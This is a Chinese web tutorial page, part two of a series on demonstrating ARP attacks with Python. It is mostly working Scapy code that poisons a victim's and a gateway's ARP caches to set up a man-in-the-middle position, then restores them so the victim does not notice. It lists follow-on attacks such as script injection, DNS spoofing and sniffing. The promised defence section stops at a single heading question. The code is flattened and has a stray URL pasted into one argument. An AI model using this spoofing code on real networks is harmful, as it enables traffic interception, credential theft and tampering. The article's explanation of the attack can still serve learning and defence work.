江苏龙网

  1. 主页 > 生活百科 > >

用Python演示ARP攻击的过程及应对办法( 二 )

ARP攻击


def spoof(target_ip, host_ip, verbose=True):"""Spoofs `target_ip` saying that we are `host_ip`.it is accomplished by changing the ARP cache of the target (poisoning)"""# get the mac address of the targettarget_mac = get_mac(target_ip)# craft the arp 'is-at' operation packet, in other words; an ARP response# we don't specify 'hwsrc' (source MAC address)# because by default, 'hwsrc' is the real MAC address of the sender (ours)arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=https://www.isolves.com/it/aq/wl/2020-09-27/host_ip, op='is-at')# send the packet# verbose = 0 means that we send the packet without printing any thingsend(arp_response, verbose=0)if verbose:# get the MAC address of the default interface we are usingself_mac = ARP().hwsrcprint("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))上面的代码获取目标的MAC地址,制作恶意ARP应答(响应)数据包,然后将其发送 。
一旦我们想停止攻击,就需要将真实地址重新分配给目标设备(以及网关),如果不这样做,受害者将失去互联网连接,那么受害人就会发现异常了,通常的做法就是我们将依次发送七个合法的ARP回复数据包,代码如下:
def restore(target_ip, host_ip, verbose=True):"""Restores the normal process of a regular networkThis is done by sending the original informations(real IP and MAC of `host_ip` ) to `target_ip`"""# get the real MAC address of targettarget_mac = get_mac(target_ip)# get the real MAC address of spoofed (gateway, i.e router)host_mac = get_mac(host_ip)# crafting the restoring packetarp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=https://www.isolves.com/it/aq/wl/2020-09-27/host_ip, hwsrc=host_mac)# sending the restoring packet# to restore the network to its normal process# we send each reply seven times for a good measure (count=7)send(arp_response, verbose=0, count=7)if verbose:print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))现在我们需要编写主要的代码,欺骗受害主机直到按下CTRL + C,代码如下:
if __name__ == "__main__":# victim ip addresstarget = "192.168.1.100"# gateway ip addresshost = "192.168.1.1"# print progress to the screenverbose = True# enable ip forwardingenable_ip_route()try:while True:# telling the `target` that we are the `host`spoof(target, host, verbose)# telling the `host` that we are the `target`spoof(host, target, verbose)# sleep for one secondtime.sleep(1)except KeyboardInterrupt:print("[!] Detected CTRL+C ! restoring the network, please wait...")restore(target, host)restore(host, target)我在Linux机器上运行了脚本,这是我的结果的屏幕截图:

用Python演示ARP攻击的过程及应对办法

文章插图
 
在此示例中,如果您尝试检查ARP缓存,确定将我的个人计算机用作受害者:
用Python演示ARP攻击的过程及应对办法

文章插图
 
您将看到攻击者的MAC地址(在本例中为“ 192.168.1.105”)与网关的相同,欺骗成功了 。
在攻击者的计算机上,当您单击CTRL + C关闭程序时,以下是还原过程的屏幕截图:
用Python演示ARP攻击的过程及应对办法

文章插图
 
回到受害者机器,您将看到网关的原始MAC地址已还原:
用Python演示ARP攻击的过程及应对办法

文章插图
 
▊ 如何应对攻击
攻击成功后,攻击者还可以做很多的事情 。例如,您可以在html响应中注入JAVAscript代码,对目标进行DNS欺骗,拦截文件并即时对其进行修改,网络嗅探和监视、钓鱼等等 。
那么如何组织arp攻击呢?


推荐阅读


上一篇:Java知识点梳理

下一篇:Django 入门介绍